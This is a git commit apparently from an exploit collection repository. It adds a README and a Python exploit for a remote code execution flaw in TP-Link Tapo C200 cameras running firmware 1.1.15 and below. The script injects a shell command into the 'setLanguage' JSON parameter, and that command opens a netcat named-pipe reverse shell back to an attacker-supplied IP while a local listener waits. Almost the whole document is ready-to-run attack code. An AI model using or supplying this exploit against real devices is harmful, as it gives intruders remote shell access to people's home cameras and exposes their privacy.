add TP-Link Tapo c200 1.1.15--RCE exp，优化目录

2022-10-31 15:10:47 +08:00 · 2022-10-31 15:10:47 +08:00 · 055f7b7627
commit 055f7b7627
parent db88debf26
3 changed files with 41 additions and 0 deletions
--- a/19-路由器/01-华为路由器/DG8045
+++ b/19-路由器/01-华为路由器/DG8045
--- a/19-路由器/02-TP-Link/Tapo
+++ b/19-路由器/02-TP-Link/Tapo
@ -0,0 +1,10 @@
+TP-Link Tapo c200 1.1.15--RCE 漏洞
+
+### 影响版本
+1.1.15 and below
+
+### exp 利用
+
+```shell
+python3 exp.py <victim_ip> <attacker_ip>
+```
--- a/19-路由器/02-TP-Link/Tapo
+++ b/19-路由器/02-TP-Link/Tapo
@ -0,0 +1,31 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+
+import os
+import requests
+import sys
+import threading
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# nc command to receive reverse shell (change it depending on your nc version)
+PORT = 1337
+REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
+NC_COMMAND = 'nc -lv %d' % PORT
+
+if len(sys.argv) < 3:
+    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
+    exit()
+
+victim = sys.argv[1]
+attacker = sys.argv[2]
+
+print("[+] Listening on %d" % PORT)
+t = threading.Thread(target=os.system, args=(NC_COMMAND,))
+t.start()
+
+print("[+] Serving payload to %s\n" % victim)
+url = "https://" + victim + ":443/"
+json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
+requests.post(url, json=json, verify=False)